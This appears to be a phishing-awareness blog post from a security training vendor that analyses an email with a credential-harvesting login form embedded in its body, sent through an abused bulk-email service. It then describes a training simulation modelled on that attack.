Email attacks are constantly mutating into more sophisticated variants. Sometimes new messages and email designs are aimed at people’s psychological triggers. Sometimes attackers use new technological tools. Regardless, we sift through tens of thousands of these attacks every week and incorporate the latest developments into our training programs. It's all about coaching your people to avoid getting hooked into something that will ruin your day… or a whole lot worse.In Off the Hook, expert Hoxhunters in the threat analysis department pinpoint:
We zero in on a real attack recently spotted in the wild and dissect it so you and your colleagues can spot others like it. And stay Off the Hook!
What's wrong with this picture? Example of a new embedded credential harvesting email.
We spotted a new type of phishing email whose credential harvesting page is smack-dab in the middle of the email body. Its stripped-down, straight-to-the-malicious-layer design makes it particularly dangerous.Typically, phishing emails contain:
Where a typical phishing email would offer more material to go over and ponder before clicking, this one’s malicious credential harvesting fields are embedded directly into the email itself.If the victim volunteers his password and presses the "Sign in" button, that data will be sent to the attacker. Password in hand, the hacker will have effectively compromised the email account.
This campaign hijacks a cloud-based automated communication service, which allows the attacker to send gajillions of emails without needing to maintain an email server. These services are commonly used for business-to-customer communications like marketing emails, automated notifications, newsletters, and so on. While one might be tempted to dismiss this credential harvesting scam as an over-simplified spray-and-pray technique, the email’s design actually makes it quite dangerous.Using these services, attackers can easily fire off large quantities of emails, frequently bypassing spam-filters, while leaving fewer digital footprints back to the crime scene. Spoofing the sender fields is also common when using these services, which further camoflages the phishing attack.
We create simulations of new threats in the wild like this one as quickly as possible. Doing so keeps simulations topical, current, and relevant to real threats confronting employees.Here is an example of a Hoxhunt simulation, which is based on the phishing technique examined in the above post:
If someone enters their credentials and clicks “View message,” the simulation is failed and the employee receives tips on how to spot the threat next time. If the user reports the email via the Hoxhunt plugin, Bravo! They pass the simulation and get a gold star to prove it.Coaching people to spot actual threats prepares people to report the scam when the real thing lands in their mailbox.While the actual attack-in-the-wild is categorized as medium in difficulty, this simulation is categorised as “easy” for Hoxhunt users, based on factors in the email and continuous data from users in more than a hundred countries.